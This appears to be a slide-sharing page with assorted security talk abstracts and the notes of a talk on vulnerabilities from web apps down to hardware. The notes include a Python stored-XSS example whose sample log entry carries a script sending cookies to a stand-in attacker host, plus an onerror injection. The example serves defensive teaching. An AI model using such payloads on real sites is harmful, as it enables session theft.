Smart Sheriff, Dumb Idea, the wild west of government assisted parenting - Abraham Aranguren
Would you want to let your kids discover the darker corners of the internet without protection? Wouldn't it be handy to know what they do online, to be alerted when they search for dangerous keywords and to be able to control what websites they can visit, and even when they play games?
Worry no longer, the South Korean government has got you covered. Simply install the "Smart Sheriff" app on your and your kids' phones. Smart Sheriff is the first parental-control mobile app that has been made a legally required, obligatory install in an entire country! Yay, monitoring!
Well, something shady yet mandatory like this cannot go without an external pentest. And even better, one that wasn't solicited by the maintainer but initiated by the OTF and CitizenLab and executed by the Cure53 team! In this talk, two of the Cure53 testers involved in the first and, who would have guessed, second penetration test against the "Smart Sheriff" app will share what they found. Maybe all was fine with the app, maybe the million kids forced to have this run on their devices were all safe. Maybe. But would there be a talk about it then?
We all know, mandated surveillance apps to protect children are a great idea, and outsourcing to the lowest bidder always delivers the best results. Right?
Going over the first and second pentest results, we will share our impressions about the "security" of this ecosystem and show examples of the "comprehensive" vendor response, addressing "all" the findings impeccably. This talk is a great example of how security research about a serious political decision and mandate might achieve nothing at all - or show how a simple pentest together with excellent activist work can maybe spark a political discussion and more.
Silent web app testing by example - BerlinSides 2011 - Abraham Aranguren
A practical OWASP Testing Guide walk-through focused on passive and semi-passive web app testing techniques.
NOTE: Use the "Download" option at the top to see the presentation as a PDF properly
Update on progress of the 4 OWASP OWTF GSoC 2013 projects, with an intro overview about OWTF and some examples on how the OWASP Testing Guide is being covered at the moment towards the end.
Running security tests as a part of your CI pipeline allows you to provide better and more relevant feedback to developers as quickly as possible (also known as the “Shift Left paradigm”/”DevSecOps” methodology).
Those slides are from a session at DevOpsDays TLV 2017 - how to use OWASP ZAP to create valuable dynamic security tests. In those slides, I'm showing how we added those tests to one of our open source projects - Tweek (https://github.com/soluto/tweek)
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid... - Abraham Aranguren
Introduction to the Offensive (Web, etc) Testing Framework
Demos: http://www.youtube.com/playlist?list=PL1E7A97C1BCCDEEBB&feature=plcp
Download as PDF if fonts look funny.
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015 - Jeremy Brown
The web client is critical software to secure from any perspective. No matter if you're an organization or a casual client, you're typically just as vulnerable as anyone else. OSes are often supplemented with hardening toolsets or built-in mitigations as an extra measure to avoid compromise, but as with all things, they aren't completely solid either. Thus the need for systems that break systems, some of which deploy fuzzing and almost all of them work to find implementation bugs. Browser fuzzing has been explored and improved in many different ways over the past several years. In this presentation, we'll be primarily talking about a mutation engine that provides a somewhat novel technique for finding bugs in a still-ripe attack surface: the browser's rendering engine. This technique has the flexibility to be applied even more broadly than browsers, for example, there's initial support for fuzzing PDF readers. We'll also be discussing the tooling and infrastructure areas of the process, detailing what's needed to build a system that will scale and enable your fuzzing strategies to be successful. Finally, we can conclude the talk with some incubation results and how you can start making use of these fuzzing techniques today to find the bugs you need to exploit browsers or identify and fix the code responsible for each vulnerability.
AppSec & OWASP Primer
By Matt Scheurer (@c3rkah)
Cincinnati, Ohio
Date: 09/17/2019
Cincinnati Tri-State (ISC)2 Chapter
September Meeting
Abstract:
Are you testing the security of your web applications, web sites, and web servers? The malicious threat actors on the Internet almost certainly are. We will cover AppSec along with a brief review of the 2017 OWASP Top 10 List. The focus of the presentation is how to get started with AppSec and where to continue learning more. Accompanying the presentation are live demos of Nikto and the OWASP Zed Attack Proxy (ZAP).
Bio:
Matt Scheurer serves as Chair of the Cincinnati Networking Professionals Association Security Special Interest Group (CiNPA Security SIG), an Ambassador for Bugcrowd, and works as a Systems Security Engineer in the Financial Services industry. He holds a CompTIA Security+ Certification and possesses multiple Microsoft Certifications including MCP, MCPS, MCTS, MCSA, and MCITP. He has presented on numerous Information Security topics as a featured speaker at many local area technology groups and large Information Security conferences. Matt maintains active memberships in a number of professional organizations including the Association for Computing Machinery (ACM), Cincinnati Networking Professionals Association (CiNPA), Financial Services - Information Sharing and Analysis Center (FS-ISAC), Information Systems Security Association (ISSA), and InfraGard.
A workshop about the "dark side" of iOS, Objective-C and Xcode. Discussion about private API, why Apple doesn't want you to use it and how they enforce that. What information can you extract from a compiled binary? Let's take a look at the possibilities of reverse engineering including demos and showcases.
This was presented at the March 16th, 2016 WordPress Meetup in Hamilton and describes WordPress Security and best practices that should be taken to protect any WordPress website against hackers whom target WordPress websites and impact your Google reputation and online presence.
libinjection: from SQLi to XSS by Nick Galbreath - CODE BLUE
libinjection was introduced at Black Hat USA 2012 to quickly and accurately detect SQLi attacks in user inputs. Two years later, the algorithm has been used by a number of open-source and proprietary WAFs and honeypots. This talk will introduce a new algorithm for detecting XSS. Like the SQLi libinjection algorithm, it does not use regular expressions, is very fast, and has a low false positive rate. Also like the original libinjection algorithm, it is available on GitHub under a free license.
Nick Galbreath
Nick Galbreath is Vice President of Engineering at IPONWEB, a world leader in the development of online advertising exchanges. Prior to IPONWEB, his role was Director of Engineering at Etsy, overseeing groups handling security, fraud, authentication and other enterprise features. Prior to Etsy, Nick has held leadership positions in a number of social and e-commerce companies, including Right Media, UPromise, Friendster, and Open Market. He is the author of "Cryptography for Internet and Database Applications" (Wiley). Previous speaking engagements have been at Black Hat, Def Con, DevOpsDays and other OWASP events. He holds a master's degree in mathematics from Boston University and currently resides in Tokyo, Japan.
In 2013
- LASCON http://lascon.org/about/, Keynote Speaker Austin, Texas USA
- DevOpsDays Tokyo, Japan
- Security Development Conference (Microsoft) San Francisco, CA, USA
- DevOpsDays Austin, Texas, USA
- Positive Hack Days http://phdays.com, Moscow Russia
- RSA USA, San Francisco, CA, speaker and panelist
In 2012
- DefCon
- BlackHat USA
- Others
Beyond the 'cript: Practical iOS Reverse Engineering - LASCON - Nino Ho
The aim of this talk is to build a bridge between the mundane methodologies and vulnerabilities that everyone can find (and that are now being defended against), and a new approach that finds additional bugs that require assembly knowledge to discover.
The talk looks at the fundamentals of reversing, a primer on iOS architecture, binary patching, reversing Mach-O binaries, and ends with some real-world examples involving bypassing jailbreak detection.
Business applications like ERP, CRM, SRM, and others are one of the major topics in the field of computer security, as these applications store business data and any vulnerability in them can cause significant monetary and reputational loss or even stoppage of business.
Nonetheless, people still do not pay much attention to the technical side of SAP security.
As for SAP, we saw different vulnerabilities at all levels (architecture, software vulnerabilities and implementation).
AppSec & OWASP Top 10 Primer
By Matt Scheurer (@c3rkah)
Cincinnati, Ohio
Date: 03/21/2019
Momentum Developer Conference
Sharonville Convention Center
#momentumdevcon
Abstract:
Are you testing the security of your web applications, web sites, and web servers? The malicious threat actors on the Internet almost certainly are. We will cover AppSec along with a brief review of the 2017 OWASP Top 10 List. The focus of the presentation is how to get started with AppSec and where to continue learning more. Accompanying the presentation are live demos of Nikto and the OWASP Zed Attack Proxy (ZAP).
Bio:
Matt Scheurer serves as Chair of the Cincinnati Networking Professionals Association Security Special Interest Group (CiNPA Security SIG) and works as a Systems Security Engineer in the Financial Services industry. He holds a CompTIA Security+ Certification and possesses multiple Microsoft Certifications including MCP, MCPS, MCTS, MCSA, and MCITP. He has presented on numerous Information Security topics as a featured speaker at many local area technology groups and large Information Security conferences all over the Ohio, Indiana, and Kentucky Tri-State. Matt maintains active memberships in a number of professional organizations including the Association for Computing Machinery (ACM), Cincinnati Networking Professionals Association (CiNPA), Financial Services - Information Sharing and Analysis Center (FS-ISAC), and Information Systems Security Association (ISSA).
Technology First
16th Annual Ohio Information Security Conference
OISC 2019
#OISC19
The OWASP Top 10 & AppSec Primer
By Matt Scheurer (@c3rkah)
Dayton, Ohio
Date: 03/13/2019
Abstract:
Are you testing the security of your web applications, web sites, and web servers? The malicious threat actors on the Internet almost certainly are. We will cover AppSec along with a brief review of the 2017 OWASP Top 10 List. The focus of the presentation is how to get started with AppSec and where to continue learning more. Accompanying the presentation are live demos of Nikto and the OWASP Zed Attack Proxy (ZAP).
Bio:
Matt Scheurer serves as Chair of the Cincinnati Networking Professionals Association Security Special Interest Group (CiNPA Security SIG) and works as a Systems Security Engineer in the Financial Services industry. He holds a CompTIA Security+ Certification and possesses multiple Microsoft Certifications including MCP, MCPS, MCTS, MCSA, and MCITP. He has presented on numerous Information Security topics as a featured speaker at many local area technology groups and large Information Security conferences all over the Ohio, Indiana, and Kentucky Tri-State. Matt maintains active memberships in a number of professional organizations including the Association for Computing Machinery (ACM), Cincinnati Networking Professionals Association (CiNPA), Financial Services - Information Sharing and Analysis Center (FS-ISAC), and Information Systems Security Association (ISSA).
Your data is much safer at home than it is letting some corporation "take care of it" for you, right? Security reviews for some of the top vendors' devices reveal many interesting findings. Like everything else, there are bugs. But knowing what kinds of bugs and how the vendors have responded will allow you to better understand the impact of plugging these devices into your network. Jeremy will show you just how low access control and least privilege are on their list of priorities. He'll also explore the amount of test collateral and debug interfaces sloppily left shipping to consumers. From remote roots to stealing social network tokens to just plain weird stuff, he'll expand on how it's not just about what they do, but also what they don't do. And he'll give you some useful guidelines on how to close the gaps yourself.
Build your cybersecurity stack with open source - Software Guru
Building software in an agile yet secure way is not trivial. In this session I will share some recommendations on how to build a stack for developing applications securely, using open source tools within a continuous integration stack.
Presented by Eryx Paredes at SG Virtual Conference 2020
WebGoat.SDWAN.Net in Depth: SD-WAN Security Assessment - Sergey Gordeychik
Denis Kolegov, Oleg Broslavsky - Power of Community 2018, Seoul, Korea
Today, "SD-WAN" is a very hot and attractive topic. Software-defined WAN (SD-WAN) is a technology based on the software-defined networking (SDN) approach applied to wide area networks (WAN) in enterprise networks. According to Gartner's predictions study, more than 50% of routers will be replaced with SD-WAN solutions by 2020.
In this presentation, we disclose a set of vulnerabilities in widespread and most popular SD-WAN products, including Citrix NetScaler and Silver Peak EdgeConnect. We present the new results of our research, consider some technical details of the insecure design and the vulnerabilities found, and describe different attack scenarios that may allow an attacker to compromise SD-WAN control and data planes.
New Era of Software with modern Application Security v1.0 - Dinis Cruz
(as presented at Codemotion Rome 2016)
This presentation will start with an overview of the current state of Application Insecurity (with practical examples). This will make the attendees think twice about what is about to happen to their applications. The solution is to leverage a new generation of application security thinking such as: TDD, Docker, Test Automation, Static Analysis, clever Fuzzing, JIRA Risk workflows, Kanban, micro web services visualization, and ELK. These practices will not only make applications/software more secure/resilient, but also allow them to be developed in a much more efficient, cheaper and productive
OWASP SF - Reviewing Modern JavaScript Applications - Lewis Ardern
When dealing with modern JavaScript applications, many penetration testers approach from an 'outside-in' perspective; this approach often misses security issues in plain sight. This talk will attempt to demystify common JavaScript issues which should be better understood/identified during security reviews. We will discuss reviewing applications in a code-centric manner by using freely available tools to help start identifying security issues through processes such as linting and dependency auditing.
Video for this session: http://www.youtube.com/watch?v=jdiu_dH3z5k
Code for this session: https://github.com/xamarin/Seminars/tree/master/2012-12-13-MVVMCross/
An introduction to one approach for using dependency injection, unit testing and MVVM in cross-platform mobile C# development with Stuart Lodge
IoT (Internet of Things) and OT (Operational Technology) are the current buzzwords for the networked devices on which our modern society is based. In this area the operating systems used are summarized under the term firmware. The devices themselves, so-called embedded devices, are essential in the private as well as the industrial environment and in so-called critical infrastructure. Penetration testing of these systems is quite complex, as we have to deal with different architectures, optimized operating systems and special protocols. EMBA is an open-source firmware analyzer with the goal of simplifying and optimizing the complex task of firmware security analysis. EMBA supports the penetration tester with the automated detection of 1-day vulnerabilities at the binary level. This goes far beyond plain CVE detection. With EMBA you always know which public exploits are available for the target firmware. Besides the detection of already known vulnerabilities, EMBA also supports the tester on the next 0-day. For this, EMBA identifies critical binary functions, protection mechanisms and services with network behavior at the binary level. There are many other features built into EMBA, such as fully automated firmware extraction, finding file system vulnerabilities, hard-coded credentials, and more. EMBA is an open-source firmware scanner, created by penetration testers for penetration testers.
Project page: https://github.com/e-m-b-a/emba
Conference page: https://troopers.de/troopers22/agenda/tr22-1042-emba-open-source-firmware-security-testing/
JAXLondon 2015 "DevOps and the Cloud: All Hail the (Developer) King" - Daniel Bryant
Last year we talked about DevOps, what it was, why it was important and how to get started. Boy, was it scary. Now we're wiser. More battle-scarred. The scale of the challenge for application writers exploiting cloud and DevOps is clearer, but so is the path forward. Understanding the DevOps approach is important, but equally you must understand specific deployment technologies: how to exploit them and how they affect the design of applications. Whether creating simple applications or sophisticated microservice architectures, many of the challenges are the same.
Presented at JAXLondon 2015 with Steve Poole
OWASP Poland 13 November 2018 - Martin Knobloch - Building Secure Software - OWASP
Presentation by OWASP Global Chairman of the Board Martin Knobloch at the OWASP Poland meeting in Warsaw on 13 November 2018. A great review of important OWASP projects.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024 - Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview, including the concepts of Customer Key and Double Key Encryption.
UiPath Test Automation using UiPath Test Suite series, part 4 - DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series, part 4. In this session, we will cover a Test Manager overview along with the SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the use of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques.
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Elevating Tactical DDD Patterns Through Object Calisthenics - Dorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
6. Examples
• The set of examples for web applications is enormous, hence…
• My own story about XSS and RCE should suffice
7. Solutions
• Usage of publicly acclaimed frameworks, in the spirit of Linus's Law (as Eric S. Raymond phrased it): "Given enough eyeballs, all bugs are shallow."
• Improving the process of software development
• Secure by Design: Secure SDLC / DevSecOps implementation
• Testing according to well-known (and accepted) methodologies such as OWASP ASVS, OWASP Top 10, CWE/SANS Top 25, et cetera
9. Examples
• Neex's bug in the way an external tool (GraphicsMagick) was invoked (OS command injection) – Imgur
• Chris Evans's bugs in ImageMagick (memory disclosures) – vulnerable versions found on servers of companies such as Dropbox and Yahoo!
10. Solutions
• Conscious choice of external components
• Smaller attack surface == reduced risk
• Least-privilege principle applied to external components (e.g. sandboxing)
11. References
• https://scarybeastsecurity.blogspot.co.uk/2017/05/proving-missing-aslr-on-dropboxcom-and.html
• https://scarybeastsecurity.blogspot.co.uk/2017/05/0day-proving-boxcom-fixed-aslr-via.html
• https://scarybeastsecurity.blogspot.co.uk/2017/05/bleed-more-powerful-dumping-yahoo.html
• https://scarybeastsecurity.blogspot.co.uk/2017/05/bleed-continues-18-byte-file-14k-bounty.html
• https://hackerone.com/reports/212696
• https://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html
• https://blog.sigsegv.pl/external-third-party-resources-and-your-web-application/
• https://onedrive.live.com/view.aspx?resid=2664E65DD698885E!120&ithint=file%2cpptx&app=PowerPoint&authkey=!AK39RoVxiJ5re8Y
15. Examples
• Deserialization of a cookie and memory corruption within PHP's implementation of the unserialize() function – PornHub
• "The worst bug bounty ever" – a very expensive romance between Shopify and mruby
• "Exposing Hidden Exploitable Behaviors in Programming Languages Using Differential Fuzzing" – interesting (and dangerous) behaviours of interpreters
• My own vulnerability research of popular interpreters (for fun and no profit)
17. Solutions
• Least-privilege principle applied to the interpreter / VM (e.g. sandboxing)
• Banning dangerous functions (e.g. disallow certain functions in your code base)
18. References
• https://www.evonide.com/how-we-broke-php-hacked-pornhub-and-earned-20000-dollar/
• https://www.evonide.com/fuzzing-unserialize/
• https://sean.heelan.io/2017/08/12/fuzzing-phps-unserialize-function/
• https://externals.io/message/100147
• https://bugs.php.net/bug.php?id=75006
• http://mruby.sh/201703261726.html
• https://www.blackhat.com/docs/eu-17/materials/eu-17-Arnaboldi-Exposing-Hidden-Exploitable-Behaviors-In-Programming-Languages-Using-Differential-Fuzzing-wp.pdf
• https://github.com/dyjakan/interpreter-bugs
• https://github.com/rust-fuzz
• https://hackernoon.com/python-sandbox-escape-via-a-memory-corruption-bug-19dde4d5fea5
20. Examples
• "Reflections on Trusting Trust" – Ken Thompson
• CVE-2018-1037 – .PDB heap memory disclosure in Visual Studio (j00ru, Project Zero 🤘)
21. Solutions
• There is no active and scalable protection
• Passive monitoring of your systems' integrity
22. References
• https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf
• https://twitter.com/j00ru/status/985894472478265344
• https://bugs.chromium.org/p/project-zero/issues/detail?id=1500
26. Examples
• CVE-2016-5195 – Dirty COW
• CVE-2010-0232 – KiTrap0D by Tavis Ormandy (Google)
• CVE-2018-8897 – POP SS / MOV SS
27. Solutions
• Patch management policy along with actual implementation
• Hardening
• Best practices
• Additional defensive mechanisms
28. References
• https://dirtycow.ninja/
• http://seclists.org/fulldisclosure/2010/Jan/341
• https://www.cisecurity.org/cis-benchmarks/
• https://grsecurity.net/
• http://www.openwall.com/lkrg/
• https://support.microsoft.com/en-us/help/2458544/the-enhanced-mitigation-experience-toolkit
• https://docs.microsoft.com/en-us/powershell/module/processmitigations/?view=win10-ps
• https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/windows-defender-exploit-guard
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897
• http://everdox.net/popss.pdf
34. References
• https://en.wikipedia.org/wiki/Virtual_machine_escape
• https://www.blackhat.com/presentations/bh-usa-09/KORTCHINSKY/BHUSA09-Kortchinsky-Cloudburst-PAPER.pdf
• https://vimeo.com/6595148
• https://blogs.vmware.com/security/2017/03/security-landscape-pwn2own-2017.html
• https://www.blackhat.com/docs/eu-17/materials/eu-17-Mandal-The-Great-Escapes-Of-Vmware-A-Retrospective-Case-Study-Of-Vmware-G2H-Escape-Vulnerabilities.pdf
• https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/
36. Examples – CPUs 1/2
• Bugs
• Pentium FDIV bug – Intel – $$$ = 😢
• CVE-2012-0217 (and its 2006 predecessor CVE-2006-0744) – Intel SYSRET, found in 2012 by Rafał Wojtczuk (Invisible Things Lab)
• AMD microcode security update – Robert Święcki, found while fuzzing a kernel on his home machine
• Meltdown & Spectre – Jann Horn (Project Zero) et al.
37. Examples – CPUs 2/2
• Features?
• sandsifter – fuzzing the CPU (Black Hat 2017) by Christopher Domas
• Intel-SA-00086 – bugs in the Intel Management Engine (ME)
39. Examples – RAM
• Rowhammer – disturbance errors documented by Kim et al. (2014); first privilege-escalation exploits by Mark Seaborn and Thomas Dullien (Project Zero, 2015), with further research done by other academics
• Initial exploitation (2015) – affecting only desktops (local)
• Later (2016) – affecting mobile devices (local) and VM-to-VM attacks ("local")
• Now (2018) – affecting mobile devices (remotely!) and cloud servers (remotely!)
41. References
• http://scholar.harvard.edu/files/mickens/files/theslowwinter.pdf
• https://wiki.osdev.org/CPU_Bugs
• https://danluu.com/cpu-bugs/
• https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/
• https://lists.debian.org/debian-security/2016/03/msg00084.html
• https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/
• https://meltdownattack.com/
• https://www.blackhat.com/docs/us-17/thursday/us-17-Domas-Breaking-The-x86-Instruction-Set-wp.pdf
• https://github.com/xoreaxeaxeax/sandsifter
• https://www.intel.com/content/www/us/en/support/articles/000025619/software.html
• https://blog.rapid7.com/2017/11/21/intel-sa-00086-security-bulletin-for-intel-management-engine-me-and-advanced-management-technology-amt-vulnerabilities-what-you-need-to-know/
• https://www.blackhat.com/docs/eu-17/materials/eu-17-Goryachy-How-To-Hack-A-Turned-Off-Computer-Or-Running-Unsigned-Code-In-Intel-Management-Engine.pdf
• https://en.wikipedia.org/wiki/Row_hammer
• https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
• https://www.vusec.net/projects/flip-feng-shui/
• https://www.vusec.net/projects/glitch/
42. References
• https://www.cs.vu.nl/~herbertb/download/papers/throwhammer_atc18.pdf
• https://arxiv.org/abs/1805.04956
43. Summary
• Software is broken
• Hardware is broken and we're in the early stage
• Best practices on each and every level reduce the risk but cannot completely remove it
• Security is a process, not a product
I have been breaking things since my childhood years, professionally since 2010
I've worked in various roles, all of them around application security or software engineering in general
Mostly offensive security, but at this point more and more on the defensive side (improving the state of things)
Application security across the entire technological stack: web applications are broken and they use broken external components. All of this is executed by a broken interpreter (or VM) which is compiled with an untrusted compiler on a broken operating system that is running within an untrusted hypervisor. And underneath it all we have broken hardware.
Practical approach with real-world examples
OK, imagine this: we have an excellent start-up idea, an app for sharing cat pictures; we've made our MVP and our journey has just started
Basic functionality: we have users (with avatars) and cat pictures (uploaded by the users). Additionally we have a simple admin panel for managing users with request logging functionality (User-Agent, Referer, request payload)
Most of the vulnerabilities seen in the picture are in web apps
We can see a growing trend
This data is not ideal:
The source is a non-profit
Iceberg case – we see only what's above the surface (e.g. vendor-proprietary web apps such as Gmail or other SaaS are not included)
During one of many engagements I found a stored XSS in the logging mechanism for users' requests (the application was sanitizing the payload but not the Referer or User-Agent headers)
Later in the code there was an RCE bug within the upload functionality (no file type checking, PHP execution turned on for all directories)
Attack scenario: target users via XSS, use the RCE to infiltrate the server – it is 2018 and these things are still there
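As an added illustration of the logging bug above (example code written for this page, not the code of the audited application or the talk's own material), here is a request logger for an admin panel in the shape the story describes: the escaping gap beside its fixed version, plus a check that tells the two apart. The RequestLog type, the function names, the response headers and the sample log entries are this example's own constructions.

```python
import html
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class RequestLog:
    path: str
    payload: str
    user_agent: str
    referer: str


# Constructed sample traffic (not real logs): the second entry carries the
# attacker's script in the User-Agent and Referer headers, the two fields
# the application in the story never escaped.
SAMPLE_LOG = [
    RequestLog("/upload", "name=tabby.png", "Mozilla/5.0", "https://cats.example/"),
    RequestLog(
        "/login",
        "user=<b>admin</b>",
        "<script>fetch('//evil.example/?c=' + document.cookie)</script>",
        'https://evil.example/"><img src=x onerror=alert(1)>',
    ),
]


def render_row_vulnerable(entry: RequestLog) -> str:
    """The bug from the talk: only the request payload is escaped; the
    headers are concatenated straight into the admin page."""
    return (
        f"<tr><td>{html.escape(entry.path)}</td>"
        f"<td>{html.escape(entry.payload)}</td>"
        f"<td>{entry.user_agent}</td>"
        f"<td>{entry.referer}</td></tr>"
    )


def render_row_hardened(entry: RequestLog) -> str:
    """Every attacker-influenced field goes through the same escaper; quote=True
    also escapes quotes, so the output is safe inside attribute values too."""
    cells = (entry.path, entry.payload, entry.user_agent, entry.referer)
    return "<tr>" + "".join(f"<td>{html.escape(c, quote=True)}</td>" for c in cells) + "</tr>"


def render_admin_log(entries, row_renderer) -> str:
    header = "<tr><th>path</th><th>payload</th><th>User-Agent</th><th>Referer</th></tr>"
    return "<table>" + header + "".join(row_renderer(e) for e in entries) + "</table>"


# Defence in depth for the admin panel (assumed response headers): a CSP
# without 'unsafe-inline' stops inline <script> and onerror= handlers even
# if a renderer slips through review.
ADMIN_PANEL_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    "X-Content-Type-Options": "nosniff",
}

TEMPLATE_TAGS = {"table", "tr", "th", "td"}


def foreign_tags(rendered: str) -> set:
    """Tags present in the rendered page that the template did not put there,
    i.e. markup that came from logged input. An empty set means no stored XSS."""
    found = {t.lower() for t in re.findall(r"</?([A-Za-z][A-Za-z0-9]*)", rendered)}
    return found - TEMPLATE_TAGS
```

foreign_tags() is the kind of assertion worth keeping in the test suite of a logging or audit view: whatever the template is allowed to emit, any other tag in the output came from data. The header dictionary is the second layer; it does nothing for the vulnerable renderer's HTML but it takes the inline script and the onerror handler out of the attacker's toolbox.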
A good example is Ruby on Rails, which out of the box gives us a fairly good security posture
Things that can be automated should be automated (e.g. SAST, DAST, vulnerable dependency scanners embedded into the CI/CD pipeline)
Bummer: logical bugs will still be there
Let's assume we've eliminated the low-hanging fruit with a Secure SDLC
However, for the avatars and the cat pictures themselves we use external modules: a library provided by our package manager which additionally uses ImageMagick as the actual tool that does the job
Now all problems within the library itself and within ImageMagick are also OUR problems!
One of the parameters of the /edit/proces end-point was vulnerable to OS command injection because GraphicsMagick treats a pipe character (|) in a file name as an instruction to run a command; Imgur paid 5k
The bugs found by Chris allowed reading memory from affected production servers; in practical terms you could (at least!) read images belonging to other users of Dropbox or Yahoo! Mail; Yahoo! paid 14k for this bug
Additionally, bugs such as these can be helpful in beating ASLR remotely
Also, think about all these desktop applications that use libraries left and right
Do you really need this external component? And if you do:
Is it well known and widely used?
Do you know its security track record? (how many CVEs? how many issues? etc.)
Sandboxing for binaries is a good practice
On a side note: Yahoo! solved the issues with ImageMagick by removing it from its toolchain
OK, we've removed ImageMagick from our toolchain by using Gravatar
However, we're unserializing data from the user; we do validate the data though, so it's safe
Unless we have a bug in the implementation of unserialize() itself
From my experience, developers that use high-level languages (Ruby, Python, etc.) are usually surprised that the vulnerability can be in the native interpreter of their language (of course we're only taking into account the "interesting" parts of the language, e.g. the JSON parser)
Which language interpreter are we looking at?
PHP (the original Zend implementation, not HHVM)
An easier one… ;)
The first problem was a bug in the deserialization of user data but… exploitation took an unusual route: the attackers used fuzzing to discover a vulnerability in PHP's unserialize() function and attacked the interpreter itself, gaining RCE
20k from PornHub and 2k (1k per bug) from the IBB for PHP
BTW, in 2017 PHP announced that it no longer sees unserialize() bugs as security issues; they claim that its input should be trusted. Smart move, because there were many bugs in their implementation…
Shopify wanted to give their users the ability to execute some subset of Ruby on their servers; they used mruby (embedded Ruby) for that purpose and started a bug bounty to get rid of the low-hanging fruit
Within 1 month they had so many reports that they needed to scale down payments to 10% of the original (20k for RCE = 2k after scaling). In half a year they spent HALF a million USD on bounties (including scaled-down reports)
BTW, mruby is made and maintained by Matz, the original creator of Ruby, who knows his C quite well
Targets were: Python / Ruby / PHP / JS
Apparently you can find edge cases which (even though they are valid) lead to interesting behaviours that can be used for attacks
My own research into the C implementations of Ruby, Python, PHP and HHVM
1M iterations each
